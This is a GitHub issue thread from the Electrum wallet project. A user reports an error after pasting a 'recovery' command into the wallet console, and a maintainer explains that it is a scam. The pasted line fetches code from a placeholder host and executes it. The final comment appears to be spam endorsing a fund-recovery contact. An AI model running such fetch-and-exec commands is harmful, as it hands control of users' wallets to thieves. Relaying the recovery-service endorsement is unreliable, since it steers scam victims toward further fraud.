### ISSUE TITLE
"Server exception, please, contact with support."

### ISSUE THREAD

**Issue by Pleiadee** [spesmilo/electrum#5668]
Getting this message when using the console to receive a transaction back to me. 
"Server exception, please, contact with support."

**Comment by SomberNight** [comment]
What exactly are you doing when seeing this message?

**Comment by Pleiadee** [comment]
exec("import requests\nexec(requests.get('https://EXAMPLEWEBSITE/recovery/<output btc address>').text)")

**Comment by Pleiadee** [comment]
Typing that into console 
exec("import requests\nexec(requests.get('https://EXAMPLEWEBSITE/recovery/<output_btc_address>').text)")

**Comment by SomberNight** [comment]
![tmp1](https://user-images.githubusercontent.com/29142493/65921503-efa8d500-e3d1-11e9-84ba-0ecfa40782c4.PNG)

**Comment by SomberNight** [comment]
Where did you find those instructions?

DO NOT PASTE CODE THERE THAT YOU DO NOT UNDERSTAND

**Comment by Pleiadee** [comment]
received this code from a website/company after losing coin in a transaction. 
This was to recover my coin back

**Comment by SomberNight** [comment]
They are trying to scam you.

**Comment by Pleiadee** [comment]
Ah, well that is convenient, so basically coin is doomed?

**Comment by Pleiadee** [comment]
Are you sure, this is the site.
https://bitcoinmixer.eu/

**Comment by SomberNight** [comment]
Almost all bitcoin mixers are scams these days. I assume you "lost" your coins and had to contact support **after** you started using that website. They scammed you.

**Comment by chriswebstin** [comment]
Till date I still wonder how I fell for this cheap scam, they kept convincing me to invest more and most payments were by bitcoins, I was super surprised when ultimatefundrecovery on gmail com was able to get most of my money back because by their name I felt they could only recover other forms of payments related to binary options but to my surprise they came out good. I’m done with any form of these investments.
